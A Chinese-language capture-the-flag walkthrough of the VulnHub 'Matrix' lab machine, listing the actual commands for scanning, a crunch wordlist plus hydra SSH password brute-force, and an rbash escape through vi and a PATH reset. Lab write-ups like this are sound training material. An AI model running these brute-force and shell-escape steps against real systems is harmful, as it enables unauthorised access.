一、靶机下载地址
https://download.vulnhub.com/matrix/Machine_Matrix.zip
二、信息收集
1、主机发现
# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:FC:22:2B"
2、端口扫描
# 使用命令
nmap 192.168.145.197 -p- -sV
3、指纹识别
# 使用命令
whatweb 192.168.145.197
4、目录扫描
# 使用命令
dirsearch -u "http://192.168.145.197"
三、获取shell
1、访问靶机IP地址
2、右击查看页面源代码,发现一张图片的链接地址
3、访问图片,应该是80端口首页提到的白兔
4、发现图片名字指向了31337
端口,访问一下,没什么发现
5、右击查看页面源代码发现一串base64加密的字符
6、base64解码,发现是把一串内容写入到了 Cypher.matrix
文件中
7、将 Cypher.matrix 文件下载下来,查看内容,发现是将过Brainfuck
加密的
8、使用BerylEnigma
工具进行解密,说是能以 guest 用户进行登录 ,密码为 k1ll0rXX ,但是最后两位忘了,所以用XX代替,需要爆破一下
9、使用kali中crunch工具生成字典
# 使用命令
crunch 8 8 -t k1ll0r%@ -o 1.txt
#参数
8 8:密码最小长度和最大长度
-t:使用特殊符号
%:0-9数字
@:小写字母
-o:输入到指定文件
10、使用 hydra
工具进行爆破,得到密码 k1ll0r7n
# 使用命令
hydra -l guest -P 1.txt ssh://192.168.145.197
11、ssh进行连接,连接成功
# 使用命令
ssh guest@192.168.145.197
四、提权
1、输入sudo -l
查看可执行的命令,发现命令被限制,无法使用
2、执行export
命令,发现是受限制shell:rbash
3、发现vi命令可以使用,vi
绕过rbash
# 使用命令
vi
按shift+:
!/bin/bash
4、发现还是无法执行命令,执行以下命令,配置环境变量绕过,发现绕过成功,所有命令都可执行
# 使用命令
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
sudo -l